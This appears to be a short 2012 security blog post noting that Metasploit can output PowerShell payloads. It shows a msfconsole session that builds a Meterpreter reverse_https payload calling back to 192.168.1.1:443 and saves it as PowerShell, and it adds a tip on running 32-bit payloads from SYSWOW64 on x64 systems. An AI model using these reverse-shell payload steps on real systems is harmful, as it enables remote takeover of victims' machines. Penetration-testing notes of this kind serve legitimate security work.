Monday, October 8, 2012

Metasploit and PowerShell payloads




Quick post, since i mentioned it in the DerbyCon talk, to mention that Metasploit generates PowerShell and PowerShell .net (looks related to this) payloads.







msf > use payload/windows/meterpreter/reverse_https
msf  payload(reverse_https) > set LHOST 192.168.1.1
LHOST => 192.168.1.1
msf  payload(reverse_https) > set LPORT 443
LPORT => 443
msf  payload(reverse_https) > generate -t psh -f https-pwrshell.txt
[*] Writing 3566 bytes to https-pwrshell.txt...
msf  payload(reverse_https) > 



Generates it based on old powersploit code here. Also a note to mention the 64 bit business I mentioned here still applies.  If you are on x64 you need to call the PowerShell in SYSWOW64 to run 32bit payloads.

PowerShell version


PowerShell .net version



CG

No comments: